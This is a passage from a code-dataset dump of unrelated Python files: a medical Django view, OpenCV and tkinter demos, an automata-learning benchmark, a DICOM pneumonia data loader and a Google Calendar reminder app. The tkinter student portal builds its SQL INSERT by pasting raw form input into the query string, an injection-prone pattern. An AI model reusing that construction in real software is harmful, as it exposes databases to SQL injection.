for x in agg_df]\n agg_df = [x for x in agg_df if type(x) != type(None)]\n df = pd.DataFrame(agg_df)\n df = df.sort_index(ascending = False)\n df.to_csv('earning_run_price.csv')\n \n\n\n\n\n\n\n\n\n","repo_name":"ShallweXiaowei/strats","sub_path":"analysis_run.py","file_name":"analysis_run.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4990433334","text":"from django.views.generic.detail import DetailView\nfrom login_signup.models.customUser import CustomUser\nfrom login_signup.models.prescription import Prescription\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.utils.decorators import method_decorator\n\ndecorators = [\n permission_required('login_signup.can_use_medical_stuff', raise_exception=True),\n login_required(login_url='login')\n]\n\n\n@method_decorator(decorators, name='dispatch')\nclass PatientTreatmentsView(DetailView):\n model = CustomUser\n template_name = 'home/patient/patient_treatments.html'\n context_object_name = 'patient'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n treatments = self.object.treatments.all()\n treatments = [treatment.name for treatment in treatments]\n prescriptions = Prescription.objects.filter(user=self.object)\n prescriptionDisease = [treatment.treatment.name for treatment in prescriptions]\n for treatment in prescriptionDisease:\n treatments.append(treatment)\n # transform list of treatments into a set to remove duplicates\n treatments = set(treatments)\n print(treatments)\n context['treatments'] = treatments\n return context\n","repo_name":"Redshark61/mon-carnet-de-sante","sub_path":"health_book/home/views/patient/patientTreatmentsView.py","file_name":"patientTreatmentsView.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5628945185","text":"import cv2\nimport numpy as np\n\n# capture video from camera\n\"\"\"\nTo capture a video, you need to create a VideoCapture object. Its argument can be either the device index or the name of a video file\neg: cv2.VideoCapture(0) or cv2.VideoCapture(\"filename.extension\")\n\"\"\"\n\n# creats a VideoCapture object\ncap = cv2.VideoCapture(0)\n\n# if there is no video or camera does'nt open up it will print the message\nif not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n\n# we are creating an infinte loop to capture the video infinite\n\"\"\"\ncap.read() returns two values one is the image/frame which is a numpy array and another is a boolean value (True/False). If the frame is read correctly, it will be True else False\n\"\"\"\n\nwhile True:\n ret, frame = cap.read()\n\n # if frame is read correctly ret is True\n if not ret:\n print(\"Can't receive frame.\")\n break\n\n \"\"\"\n Note: In OpenCV the color is in BGR (BLUE, GREEN, RED) format\n \"\"\"\n\n # draw a diagonal line\n \"\"\"\n Blue line with thickness of 5 px\n (image, starting point, end point, color, thickness)\n \"\"\"\n cv2.line(frame,(0,0),(511,511),(255,0,0),5)\n\n # draw rectangle\n \"\"\"\n To draw a rectangle, you need top-left corner and bottom-right corner of rectangle. \n Drawing a green rectangle at the top-right corner of image.\n \"\"\"\n cv2.rectangle(frame,(384,0),(510,128),(0,255,0),3)\n\n # draw circle\n \"\"\"\n To draw a circle, you need its center coordinates and radius. \n Here we will draw a circle inside the rectangle drawn above , -1 for filled circle.\n \"\"\"\n cv2.circle(frame,(447,63), 63, (0,0,255), 4)\n \n # draw polygon\n \"\"\"\n To draw a polygon, first you need coordinates of vertices. Make those points into an array of shape ROWSx1x2 where ROWS are number of vertices and it should be of type int32. \n Here we draw a small polygon of with four vertices in yellow color.\n \"\"\"\n pts = np.array([[10,5],[20,30],[70,20],[50,10]], np.int32)\n pts = pts.reshape((-1,1,2))\n cv2.polylines(frame,[pts],True,(0,255,255))\n\n # adding text\n \"\"\"\n To put texts in images, you need specify following things.\n Text data that you want to write\n Position coordinates of where you want put it (i.e. bottom-left corner where data starts).\n Font type (Check cv.putText() docs for supported fonts)\n Font Scale (specifies the size of font)\n regular things like color, thickness, lineType etc.\n For better look, lineType = cv.LINE_AA is recommended.\n \"\"\"\n # (frame, text, position, font, size/scale, color, thickness, cv2.LINE_AA)\n # cv2.LINE_AA is the line type\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(frame, 'OpenCV Test', (10,300), font, 2, (255,255,255), 2, cv2.LINE_AA)\n\n # display the frame\n cv2.imshow(\"Frame\", frame)\n\n # it will wait for 1 millisecond to capture next frame and also if the key q is pressed it will stop\n if cv2.waitKey(1) == ord('q'):\n break\n\n# releasing the capture when everything is done\ncap.release()\ncv2.destroyAllWindows()","repo_name":"milan-sony/open_cv-test","sub_path":"opencv_test4.py","file_name":"opencv_test4.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36257352433","text":"import sqlite3\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import *\r\n\r\n\r\nconnection=sqlite3.connect(\"Student_portal.db\")\r\n# connection = sqlite3.connect(\"student1.db\")\r\n\r\nstdportal=tk.Tk()\r\nstdportal.title(\" Student Portal \")\r\nstdportal.geometry(\"1100x500\")\r\n# stdportal.config(font=(\"Arial\" ,20))\r\n# stdportal.grid(row=0, column=0)\r\nheading=tk.Label(stdportal, text= \"Enter your Details below\", width=50)\r\nheading.config(font=(\"arial\", 18))\r\nheading.grid(row=0, column=1, pady=(10,10))\r\n\r\nstu_name=tk.Label(stdportal, text= \"Enter your name\", width=30)\r\nstu_name.config(font=(\"arial\", 15))\r\nstu_name.grid(row=1, column=0, pady=(10,10))\r\nStudent_name= tk.Entry(stdportal)\r\nStudent_name.config(font=(\"arial\", 30))\r\nStudent_name.grid(row=1, column=1, pady=(0,10))\r\n\r\nstu_Id=tk.Label(stdportal, text= \"Enter your ID\", width=30)\r\nstu_Id.config(font=(\"arial\", 15))\r\nstu_Id.grid(row=2, column=0, pady=(0,10) )\r\nStudent_ID= tk.Entry(stdportal)\r\nStudent_ID.config(font=(\"arial\", 30))\r\nStudent_ID.grid(row=2, column=1, pady=(0,10) )\r\n\r\n\r\nstu_college=tk.Label(stdportal, text= \"Enter your college\", width=30)\r\nstu_college.config(font=(\"arial\", 15))\r\nstu_college.grid(row=3, column=0, pady=(0,10) )\r\nStudent_college= tk.Entry(stdportal)\r\nStudent_college.config(font=(\"arial\", 30))\r\nStudent_college.grid(row=3, column=1, pady=(0,10) )\r\n\r\nstu_add=tk.Label(stdportal, text= \"Enter your address\", width=30)\r\nstu_add.config(font=(\"arial\", 15))\r\nstu_add.grid(row=4, column=0, pady=(0,10) )\r\nStudent_address= tk.Entry(stdportal)\r\nStudent_address.config(font=(\"arial\", 30))\r\nStudent_address.grid(row=4, column=1, pady=(0,10) )\r\n\r\nstu_ph=tk.Label(stdportal, text= \"Enter your phone\", width=30)\r\nstu_ph.config(font=(\"arial\", 15))\r\nstu_ph.grid(row=5, column=0, pady=(0,10) )\r\nStudent_phone= tk.Entry(stdportal)\r\nStudent_phone.config(font=(\"arial\", 30))\r\nStudent_phone.grid(row=5, column=1, pady=(0,10))\r\n\r\n# Table_name = \"student1_table\"\r\n\r\nTable_name1 = \"stdportal_table\"\r\nStudent_ID1 = \"stdportal_ID\"\r\nStudent_name1 = \"stdportal_name\"\r\nStudent_college1 = \"stdportal_college\"\r\nStudent_address1 = \"stdportal_address\"\r\nStudent_phone1 = \"stdportal_phone\"\r\n\r\ndef ret():\r\n global secondwinow\r\n secondwinow = tk.Tk()\r\n\r\n secondwinow.title(\"display result\")\r\n\r\n appLabel = tk.Label(secondwinow, text=\"Student management system\", fg=\"#06a099\", width=30)\r\n appLabel.config(font=(\"Sylfaen\", 25))\r\n appLabel.grid(row=0, column=1)\r\n\r\n tree = ttk.Treeview(secondwinow)\r\n tree[\"columns\"] = (\"one\", \"two\", \"three\", \"four\")\r\n tree.heading(\"one\", text=\"student name\")\r\n tree.heading(\"two\", text=\"college name\")\r\n tree.heading(\"three\", text=\"student address\")\r\n tree.heading(\"four\", text=\"student phone no.\")\r\n\r\n\r\n cursor =connection.execute(\"SELECT * FROM \" + Table_name1 + \" ;\")\r\n i = 0\r\n\r\n for row in cursor:\r\n tree.insert('', i, text=\"student\" + str(row[0]),\r\n values=(row[1], row[2], row[3], row[4]))\r\n i = i + 1\r\n\r\n tree.grid(row=2, column=1)\r\n connection.close()\r\n secondwinow.mainloop()\r\n\r\ndef input1():\r\n global Table_name1\r\n Table_name1 = \"stdportal_table\" # table name\r\n Student_ID1 = \"stdportal_ID\"\r\n Student_name1 = \"stdportal_name\"\r\n Student_college1 = \"stdportal_college\"\r\n Student_address1 = \"stdportal_address\"\r\n Student_phone1 = \"stdportal_phone\"\r\n\r\n\r\n ID1 = Student_ID.get()\r\n name1 = Student_name.get()\r\n college1 = Student_college.get()\r\n address1 = Student_address.get()\r\n phone1 = Student_phone.get()\r\n # stdportal.geometry(\"800+400+500+700\")\r\n\r\n\r\n connection.execute(\" CREATE TABLE IF NOT EXISTS \" + Table_name1 + \" ( \" + Student_ID1 + \" INTEGER PRIMARY KEY AUTOINCREMENT, \"\r\n + Student_name1 + \" TEXT, \" + Student_college1 + \" TEXT, \" + Student_address1\r\n + \" TEXT, \" + Student_phone1 + \" INTEGER);\")\r\n\r\n connection.execute(\" INSERT INTO \" + Table_name1 + \" ( \" + Student_name1 + \" , \" + Student_college1 + \" , \" + Student_address1 + \" , \"\r\n + Student_phone1 + \" ) VALUES ('\" + name1 + \"' , '\" + college1 + \"' , '\" + address1 + \"' , \" + str(phone1) + \" ); \")\r\n connection.commit()\r\n\r\n\r\ndef retr():\r\n cursor1 = connection.execute(\"SELECT * FROM \" + Table_name1 + \";\")\r\n for row in cursor1:\r\n print(\"Student ID id : \", row[0])\r\n print(\"Student name : \", row[1])\r\n print(\"Student college : \", row[2])\r\n print(\"Student address : \", row[3])\r\n print(\"Student phone number : \", row[4])\r\n\r\n connection.close()\r\n\r\n\r\nbutton= tk.Button(stdportal, text= \" LOGIN \" , command= lambda: input1())\r\nbutton.config(font=(\"arial\", 18))\r\nbutton.grid(row=7, column=1, pady=(0,10))\r\n\r\nretri = tk.Button(stdportal, text= \"Retrive the entered details : \" , command= lambda: retr())\r\nretri.config(font=(\"arial\", 18))\r\nretri.grid(row=8, column=0, pady=(0,10))\r\n\r\n\r\nlistoftable = tk.Button(stdportal, text= \" GET ENTERED VALUES : \" , command= lambda: ret())\r\nlistoftable.config(font=(\"arial\", 18))\r\nlistoftable.grid(row=8, column=1, pady=(0,10))\r\nstdportal.mainloop()\r\n","repo_name":"Anvi8/Student-Management-system","sub_path":"student management system.py","file_name":"student management system.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"732744324","text":"import random\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nfrom utils.chinese_char import chars_list_casia, chars_list2\r\nfrom utils.prepro import normLization01, normLization_11\r\nfrom PyQt5.QtCore import pyqtSignal, QSize, QPoint\r\nfrom PyQt5.QtGui import QPainter, QPainterPath\r\nfrom PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QApplication\r\nimport os\r\n\r\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\r\n\r\n\r\ndef show(file):\r\n f = open('./data/txt/' + file, 'r')\r\n X = []\r\n Y = []\r\n for l in f.readlines():\r\n X.append(float(l.split(',')[0]))\r\n Y.append(float(l.split(',')[1].strip('\\n')))\r\n d_x = np.max(X) - np.min(Y)\r\n d_y = np.max(Y) - np.min(Y)\r\n nw = d_x / d_y * 2\r\n plt.figure(figsize=(20, 3))\r\n # plt.plot(X, Y, linewidth=0.8, marker='.', markersize=2)\r\n plt.plot(X, Y, linewidth=0.8)\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef iahw_out_dict():\r\n file = open('./data/txt/iahcc_label_dict.txt')\r\n num = []\r\n char = []\r\n dt = {}\r\n for l in file.readlines():\r\n t = l.split('\\t')[0]\r\n if ',' in t:\r\n t = t.split(',')[0] + t.split(',')[1]\r\n num.append(int(t))\r\n char.append(l.split('\\t')[1])\r\n for i in range(len(num)):\r\n dt.setdefault(num[i], char[i])\r\n return dt\r\n\r\n\r\ndef hwdb_out_dict():\r\n file = open('./data/txt/hwdb_char_list.txt', encoding='utf-8')\r\n num = []\r\n t = 1\r\n char = []\r\n dt = {}\r\n for l in file.readlines():\r\n num.append(t)\r\n t += 1\r\n char.append(l.split('\\n')[0])\r\n for i in range(len(num)):\r\n dt.setdefault(num[i], char[i])\r\n return dt\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # f = open('./data/txt/old_casia_2247/train_data.txt', 'r', encoding='utf-8')\r\n # fe = open('./data/txt/old_casia_2247/cmp13_data.txt', 'r', encoding='utf-8')\r\n # x = []\r\n # y = []\r\n # for l in f.readlines():\r\n # for c in l.split('$')[1].strip('\\n'):\r\n # x.append(c)\r\n # for l in fe.readlines():\r\n # for c in l.split('$')[1].strip('\\n'):\r\n # y.append(c)\r\n # cnt = 0\r\n # for i in range(len(y)):\r\n # if y[i] not in x:\r\n # cnt += 1\r\n # print(len(y), cnt)\r\n\r\n # data = torch.load('./data/txt/iahcc/train_data_5.pt')\r\n # iahw_dt = iahw_out_dict()\r\n # hwdb_dt = hwdb_out_dict()\r\n # c = 0\r\n # while c < 1000:\r\n # cnt = 0\r\n # x = []\r\n # y = []\r\n # total = random.randint(14, 18)\r\n # x_max = 0\r\n # s = \"\"\r\n # while cnt < total:\r\n # k = random.randint(1, len(data))\r\n # d = data[k]['data']\r\n # label = data[k]['label']\r\n # if iahw_dt[label] in chars_list_casia:\r\n # cnt += 1\r\n # s += iahw_dt[label]\r\n # l = len(d[0])\r\n # distance = 4 * random.random()\r\n # for i in range(l):\r\n # x.append(d[0][i] + x_max + distance)\r\n # y.append(d[1][i])\r\n # x_max = max(x) + distance\r\n # print(s)\r\n # x, y = normLization_11(x, y)\r\n # if len(x) <= 2998:\r\n # with open('./data/txt/extra_data/iahw_extra_data_xy/iahw_' + str(c+3000) + '.txt', 'a+') as fout:\r\n # for i in range(len(x)):\r\n # fout.write(str(x[i]) + ',' + str(y[i]) + '\\n')\r\n # txt_file = open('./data/txt/iahw_extra_data.txt', 'a+')\r\n # txt_file.write('iahw_'+str(c+3000)+'.txt$'+s+'\\n')\r\n # c += 1\r\n\r\n # x, y = normLization01(x, y)\r\n # plt.plot(x, y)\r\n # plt.show()\r\n\r\n for fname in os.listdir('./data/txt/extra_data/iahw_extra_data_xy/'):\r\n x = []\r\n y = []\r\n file = open('./data/txt/extra_data/iahw_extra_data_xy/'+fname, 'r')\r\n for l in file.readlines():\r\n x.append(float(l.split(',')[0]))\r\n y.append(float(l.split(',')[1].strip()))\r\n count = len(open('./data/txt/extra_data/iahw_extra_data_xy/'+fname, 'r').readlines())\r\n if count < 2998:\r\n for i in range(2998 - count):\r\n x.append(0)\r\n y.append(0)\r\n for i in range(len(x)):\r\n with open('./data/txt/extra_data/iahw_extra_feature/'+fname,'a+') as fp:\r\n fp.write(str(x[i])+','+str(y[i])+'\\n')\r\n\r\n\r\n\r\n","repo_name":"xm1233/olhwr","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33231212818","text":"from statistics import mean\nimport csv\n\nfrom aalpy.SULs import DfaSUL, MealySUL, MooreSUL\nfrom aalpy.learning_algs import run_Lstar\nfrom aalpy.oracles import RandomWalkEqOracle\nfrom aalpy.utils import generate_random_dfa, generate_random_mealy_machine, generate_random_moore_machine\n\nnum_states = 1000\nalph_size = 5\n\nrepeat = 10\nnum_increases = 20\n\nstates = ['alph_size', alph_size]\ntimes_dfa = ['dfa_pypy_rs']\ntimes_mealy = ['mealy_pypy_rs']\ntimes_moore = ['moore_pypyrs']\n\ncex_processing = 'rs'\nfor i in range(num_increases):\n print(i)\n total_time_dfa = []\n total_time_mealy = []\n total_time_moore = []\n\n for _ in range(repeat):\n alphabet = list(range(alph_size))\n\n dfa = generate_random_dfa(num_states, alphabet=alphabet, num_accepting_states=num_states // 2)\n sul = DfaSUL(dfa)\n\n # eq_oracle = StatePrefixEqOracle(alphabet, sul, walks_per_state=5, walk_len=40)\n eq_oracle = RandomWalkEqOracle(alphabet, sul, num_steps=10000, reset_prob=0.09)\n\n _, data = run_Lstar(alphabet, sul, eq_oracle, cex_processing=cex_processing, cache_and_non_det_check=False,\n return_data=True, automaton_type='dfa')\n\n total_time_dfa.append(data['learning_time'])\n del dfa\n del sul\n del eq_oracle\n\n mealy = generate_random_mealy_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)\n sul_mealy = MealySUL(mealy)\n\n # eq_oracle = StatePrefixEqOracle(alphabet, sul_mealy, walks_per_state=5, walk_len=40)\n eq_oracle = RandomWalkEqOracle(alphabet, sul_mealy, num_steps=10000, reset_prob=0.09)\n\n _, data = run_Lstar(alphabet, sul_mealy, eq_oracle, cex_processing=cex_processing,\n cache_and_non_det_check=False,\n return_data=True, automaton_type='mealy')\n\n total_time_mealy.append(data['learning_time'])\n\n del mealy\n del sul_mealy\n del eq_oracle\n\n moore = generate_random_moore_machine(num_states, input_alphabet=alphabet, output_alphabet=alphabet)\n moore_sul = MooreSUL(moore)\n\n # eq_oracle = StatePrefixEqOracle(alphabet, moore_sul, walks_per_state=5, walk_len=40)\n eq_oracle = RandomWalkEqOracle(alphabet, moore_sul, num_steps=10000, reset_prob=0.09)\n\n _, data = run_Lstar(alphabet, moore_sul, eq_oracle, cex_processing=cex_processing,\n cache_and_non_det_check=False,\n return_data=True, automaton_type='moore')\n\n total_time_moore.append(data['learning_time'])\n\n alph_size += 5\n states.append(alph_size)\n\n # save data and keep averages\n times_dfa.append(round(mean(total_time_dfa), 4))\n times_mealy.append(round(mean(total_time_mealy), 4))\n times_moore.append(round(mean(total_time_moore), 4))\n\nwith open('increasing_alphabet_experiments.csv', 'w') as f:\n wr = csv.writer(f, dialect='excel')\n wr.writerow(states)\n wr.writerow(times_dfa)\n wr.writerow(times_mealy)\n wr.writerow(times_moore)\n","repo_name":"DES-Lab/AALpy","sub_path":"Benchmarking/benchmark_alphabet_increase.py","file_name":"benchmark_alphabet_increase.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"7"} +{"seq_id":"23647017198","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 30 2019\n@author: Subin Joo\ncheckDicom3: add Augmentation, age output\n\"\"\"\nfrom os import listdir\nfrom os.path import isfile, join\nimport csv\nimport pydicom\nfrom pydicom.data import get_testdata_files\nfrom PIL import Image\nimport numpy as np\nimport random\nimport torch\n\n# convert grayscale * 3 -> rgb\ndef convert1Dto3D(imgArr):\n out=[imgArr for i in range(3)]\n return np.stack(out)\n\n# load all files -> seperate abnormal/normal -> shuffle respectively -> merger 6000 abnormal + 6000 normal -> shuffle again\ndef rearrange(onlyfiles,listId,listLabel): \n fileName_abnormal,fileName_normal=[],[]\n for oneFile in onlyfiles: # scan dicom file\n if listLabel[listId.index(oneFile[:-4])] == '1': # if dicom file is pneumonia patient\n fileName_abnormal.append(oneFile) # add filename in abnormal list -> total 6012\n else:\n fileName_normal.append(oneFile) # normal list -> total 20672\n \n # abnormal random 6000 datasets + normal random 6000 datasets\n onlyfiles_re=random.sample(fileName_abnormal,6000)+random.sample(fileName_normal,6000)\n \n return random.sample(onlyfiles_re,12000) # random shuffle\n\nclass dataLoad01:\n def __init__(self,resize=(224,224),ratioTraining=0.9,numOfDicom=1000,scale=\"gray\"): \n # step1: load dicom file\n dataDir='stage_2_train_images'\n onlyfiles = [f for f in listdir(dataDir) if isfile(join(dataDir, f))]\n \n # step2: laod csv file\n dataDir_csv='stage_2_train_labels.csv'\n listId,listLabel = [],[]\n with open(dataDir_csv) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for i, oneline in enumerate(csv_reader):\n if i>0:\n listId.append(oneline[0]) # Dicom file name\n listLabel.append(oneline[5]) # patient or not\n \n # step3: shuffle data + balacing data, patients:normal -> 50:50 (nearly, not exact)\n onlyfiles=rearrange(onlyfiles,listId,listLabel)\n \n # step4: create Full image List\n images,labels=[],[]\n ageLabels=[]\n for i, oneFile in enumerate(onlyfiles[:numOfDicom]):\n if oneFile[:-4] in listId:\n if (i%100 == 0): print(\"in progress : %d / %d \" %(i,len(onlyfiles)) )\n \n # load dicom\n filename= dataDir + '/' + oneFile\n dataset = pydicom.dcmread(filename)\n \n # dicom -> image -> resize (with ANTIALIAS) -> array\n arr2img=dataset.pixel_array\n img = Image.fromarray(arr2img)\n img.thumbnail(resize, Image.ANTIALIAS) \n \n img=(np.array(img,dtype=np.int16) - 128) / 128 # img > numpy array, normalization\n if scale == \"gray\":\n img_reshape=img.reshape((1,img.shape[0],img.shape[1])) # (224,224) -> (1,224,224)\n elif scale == \"rgb\":\n img_reshape=convert1Dto3D(img) # (224,224) -> (3,224,224)\n \n images.append(img_reshape) # image list\n labels.append(int(listLabel[listId.index(oneFile[:-4])])) # label list\n \n # patient age\n ageLabels.append(int(dataset.PatientAge)/100) # age 0 ~ 100 -> convert 0.0 ~ 1\n \n images = np.stack(images) # 3D -> 4d (1,224,244) -> (:,1,244,244)\n \n size=images.shape[0] # number of total dataset \n numOfTraining=int(size*ratioTraining)\n \n # separate dataset\n self.images_train=images[:numOfTraining,:,:,:]\n self.images_test=images[numOfTraining:,:,:,:]\n \n self.labels_train=labels[:numOfTraining]\n self.labels_test=labels[numOfTraining:]\n \n self.age_train=ageLabels[:numOfTraining]\n self.age_test=ageLabels[numOfTraining:]\n \n self.sizeTrain,self.sizeTest = self.images_train.shape[0], self.images_test.shape[0]\n print(\"train datasets size: \"+str(self.images_train.shape))\n print(\"test datasets size: \"+str(self.images_test.shape))\n \n # count number of call\n self.countBatch = 0\n self.countTestData = 0\n \n def batch(self,batch_size=4): # load a few samples of dataset for training\n rangeStart = self.countBatch * batch_size\n rangeEnd = (self.countBatch + 1) * batch_size\n \n selectedImage=self.images_train[rangeStart:rangeEnd,:,:,:]\n labels=np.array(self.labels_train)\n selectedLabel=labels[rangeStart:rangeEnd]\n \n agelabels=np.array(self.age_train)\n selectedAgeLabel=agelabels[rangeStart:rangeEnd]\n \n self.countBatch +=1\n if ( (self.countBatch + 1) * batch_size) > self.sizeTrain: # if rangeEnd is bigger than total size -> initialization\n self.countBatch = 0\n \n return torch.tensor(selectedImage).float(),torch.tensor(selectedLabel).long(),torch.tensor(selectedAgeLabel).float()\n \n def testData(self,batch_size=4):# load a few samples of dataset for testing\n rangeStart = self.countTestData * batch_size\n rangeEnd = (self.countTestData + 1) * batch_size\n \n selectedImage=self.images_test[rangeStart:rangeEnd,:,:,:]\n labels=np.array(self.labels_test)\n selectedLabel=labels[rangeStart:rangeEnd]\n \n agelabels=np.array(self.age_test)\n selectedAgeLabel=agelabels[rangeStart:rangeEnd]\n \n self.countTestData +=1\n if ( (self.countTestData + 1) * batch_size) > self.sizeTest: # if rangeEnd is bigger than total size -> initialization\n self.countTestData = 0\n \n return torch.tensor(selectedImage).float(),torch.tensor(selectedLabel).long().long(),torch.tensor(selectedAgeLabel).float()\n \n def augmentation_Gaussian_noise(self,mu=0.0,sigma=10.0):\n print(\"\\naugmentation : Gaussian noise\")\n # train datasets\n addNoise = self.images_train+(np.random.normal(mu, sigma,self.images_train.shape)-128.0)/128.0 # original data + noise\n self.images_train = np.vstack((self.images_train,addNoise))\n \n self.labels_train = self.labels_train + self.labels_train # list + list\n self.age_train = self.age_train + self.age_train # list + list\n \n # test datasets\n addNoise = self.images_test+(np.random.normal(mu, sigma,self.images_test.shape)-128.0)/128.0 # original data + noise\n self.images_test = np.vstack((self.images_test,addNoise))\n \n self.labels_test = self.labels_test + self.labels_test # list + list\n self.age_test = self.age_test + self.age_test # list + list\n \n # update size of datasets\n self.sizeTrain,self.sizeTest = self.images_train.shape[0], self.images_test.shape[0]\n print(\"train datasets size: \"+str(self.images_train.shape))\n print(\"test datasets size: \"+str(self.images_test.shape))\n\n def augmentation_Image_flip(self): \n print(\"\\naugmentation : Image flip left<>right\")\n # train datasets\n fliped = np.flip(self.images_train, 3) # images_train -> (numOfimage, rgb, y, x) -> flip 4th axis\n self.images_train = np.vstack((self.images_train,fliped))\n \n self.labels_train = self.labels_train + self.labels_train # list + list\n self.age_train = self.age_train + self.age_train # list + list\n \n # test datasets\n fliped = np.flip(self.images_test, 3) # images_test -> (numOftest, rgb, y, x) -> flip 4th axis\n self.images_test = np.vstack((self.images_test,fliped))\n \n self.labels_test = self.labels_test + self.labels_test # list + list\n self.age_test = self.age_test + self.age_test # list + list\n \n # update size of datasets\n self.sizeTrain,self.sizeTest = self.images_train.shape[0], self.images_test.shape[0]\n print(\"train datasets size: \"+str(self.images_train.shape))\n print(\"test datasets size: \"+str(self.images_test.shape))\n \n ","repo_name":"subinjoo/public","sub_path":"kaggle/RSNA_1904/checkDicom3.py","file_name":"checkDicom3.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1310787712","text":"import logging\nfrom typing import Any, List, Set\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QMessageBox\n\nfrom bulk_reminders import api\nfrom bulk_reminders.api import Event\nfrom bulk_reminders.gui_base import Ui_MainWindow\nfrom bulk_reminders.load import LoadDialog\nfrom bulk_reminders.oauth import OAuthDialog\nfrom bulk_reminders.undo import IDPair\n\nlogging.basicConfig(format='[%(asctime)s] [%(levelname)s] [%(threadName)s] %(message)s')\nlogger = logging.getLogger(__file__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, *args, **kwargs):\n # Initial UI setup\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setupUi(self)\n logger.debug('UI Initialized.')\n self.show()\n\n self.calendar = api.Calendar()\n self.currentCalendarID = 'primary'\n\n # Authenticate user into Google API Engine\n self.authenticated = self.calendar.authenticate_via_token()\n if not self.authenticated:\n temp_dialog = OAuthDialog(callback=self.calendar.authenticate_via_oauth)\n temp_dialog.show()\n self.calendar.setupService()\n\n # Get Calendars, Setup Calendar Selection Combobox\n calendars = self.calendar.getCalendarsSimplified()\n self.comboModel = QtGui.QStandardItemModel()\n for id, summary in calendars:\n item = QtGui.QStandardItem(summary)\n item.setData(id)\n self.comboModel.appendRow(item)\n self.calendarCombobox.setModel(self.comboModel)\n self.calendarCombobox.currentIndexChanged[int].connect(self.comboBoxChanged)\n\n # Make sure the current calendar ID matches up\n self.currentCalendarID = self.comboModel.item(self.calendarCombobox.currentIndex()).data()\n\n # Setup Column View headers\n self.eventsView.setColumnCount(4)\n self.eventsView.setHorizontalHeaderLabels(['Summary', 'Status', 'Start', 'End'])\n header = self.eventsView.horizontalHeader()\n header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)\n header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)\n header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)\n self.eventsView.verticalHeader().hide()\n\n self.undoButton.clicked.connect(self.undo)\n self.submitButton.clicked.connect(self.submit)\n\n self.history: List[IDPair] = []\n self.historyCalendarID: str = ''\n\n # Disable the undo button until undo stages are available\n if len(self.history) == 0:\n self.undoButton.setDisabled(True)\n\n self.loadEventsButton.clicked.connect(self.load_events)\n self.cachedLoadText = ''\n self.readyEvents: List[Event] = []\n self.apiEvents: List[dict] = []\n\n self.populate()\n\n def load_events(self) -> None:\n \"\"\"Open the event loading dialog\"\"\"\n dial = LoadDialog()\n dial.plainTextEdit.setPlainText(self.cachedLoadText)\n result = dial.exec()\n\n if result == QMessageBox.Accepted:\n self.cachedLoadText = dial.plainTextEdit.toPlainText()\n self.readyEvents = dial.parsed\n self.populate()\n\n def undo(self) -> None:\n \"\"\"Get the latest undo stage and delete all events in that stage\"\"\"\n logging.info(f'Deleting {len(self.history)} Events from Calendar {self.historyCalendarID}')\n\n self.progressBar.show()\n self.progressBar.setMaximum(len(self.history))\n for i, entry in enumerate(self.history):\n logging.debug(f'Deleting Event {entry.eventID}')\n self.calendar.service.events().delete(calendarId=entry.calendarID, eventId=entry.eventID).execute()\n self.progressBar.setValue(i + 1)\n self.progressBar.hide()\n\n # Disable the undo button until undo stages are available\n self.history = []\n self.undoButton.setDisabled(len(self.history) == 0)\n self.populate() # Refresh\n\n def getForeign(self) -> Set[Any]:\n \"\"\"Returns all events currently tracked that are not stored in the undo.\"\"\"\n foreign = {event.get('id'): event for event in self.apiEvents}\n undoableIDs = set(pair.eventID for pair in self.history)\n return {foreign[eventID] for eventID in undoableIDs.difference(foreign.keys())}\n\n def submit(self) -> None:\n self.historyCalendarID = self.currentCalendarID\n self.history = []\n\n logger.info(f'Submitting {len(self.readyEvents)} events to API')\n\n self.progressBar.show()\n self.progressBar.setMaximum(len(self.readyEvents))\n for i, event in enumerate(self.readyEvents):\n logger.debug(f'Submitting \"{event.summary}\" scheduled to start on {event.start.isoformat()}....')\n result = self.calendar.service.events().insert(calendarId=self.currentCalendarID, body=event.body).execute()\n self.history.append(IDPair(self.currentCalendarID, result.get('id')))\n self.progressBar.setValue(i + 1)\n\n self.undoButton.setDisabled(len(self.history) == 0)\n self.readyEvents.clear()\n self.progressBar.hide()\n\n self.populate()\n\n def populate(self) -> None:\n \"\"\"Re-populate the table with all of the events\"\"\"\n self.apiEvents = self.calendar.getEvents(self.currentCalendarID)\n\n events = list(self.readyEvents)\n events.extend([Event.from_api(event, 